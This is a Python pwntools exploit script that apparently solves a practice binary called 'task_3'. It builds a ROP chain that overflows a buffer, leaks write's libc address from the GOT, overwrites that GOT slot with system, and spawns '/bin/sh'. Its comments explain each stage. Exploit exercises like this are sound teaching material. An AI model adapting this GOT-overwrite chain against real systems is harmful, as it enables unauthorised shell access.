from pwn import *

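r = process("./task_3")
elf = ELF("./task_3")

# Addresses come from the target binary itself; this only works because the
# binary is loaded at a fixed address (non-PIE, 32-bit).
read_plt = elf.plt['read']
write_plt = elf.plt['write']
write_got = elf.got['write']
# pop;pop;pop;ret gadget used to discard the three arguments of each call.
# NOTE(review): hard-coded for this build of task_3 — re-find it (ROPgadget /
# pwntools ROP) if the binary changes.
pppr = 0x0804855d
bss = elf.bss()           # writable scratch area at a fixed address
binsh = b"/bin/sh\x00"   # exactly 8 bytes, matching the read(…, 8) below

# Distance system - write inside the libc the task runs against. Such offsets
# are specific to one libc build; recompute them (e.g.
# libc.sym['system'] - libc.sym['write']) when targeting a different libc.
SYSTEM_OFFSET = 0x9add0

# Stage 1: write(1, &write@got, 4) -> leak write's resolved libc address.
# Leak exactly the 4 bytes we consume below so nothing is left in the buffer.
payload = b"\x90" * 140  # filler up to the saved return address
payload += p32(write_plt)
payload += p32(pppr)
payload += p32(1)
payload += p32(write_got)
payload += p32(4)

# Stage 2: read(0, &write@got, 4) -> overwrite write's GOT slot with system.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(write_got)
payload += p32(4)

# Stage 3: read(0, bss, 8) -> place "/bin/sh\0" at a known address.
payload += p32(read_plt)
payload += p32(pppr)
payload += p32(0)
payload += p32(bss)
payload += p32(8)

# Stage 4: write@plt now jumps to system -> system("/bin/sh").
payload += p32(write_plt)
payload += b"\x90" * 4   # return address after system; never used
payload += p32(bss)

# Bytes literals keep this working on both Python 2 and Python 3 pwntools
# (p32() returns bytes on Python 3, which cannot be concatenated with str).
r.sendline(payload)

# recvn blocks until all 4 bytes have arrived; a plain recv(4) may return a
# short read, and u32() would then fail on the truncated value.
libc_write = u32(r.recvn(4))
libc_system = libc_write - SYSTEM_OFFSET

log.info("libc_write = {}".format(hex(libc_write)))
log.info("libc_system = {}".format(hex(libc_system)))

# The two read() calls consume exactly the sizes requested (4 then 8), so it
# does not matter whether these two sends coalesce in the pipe.
r.send(p32(libc_system))
r.send(binsh)

r.interactive()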
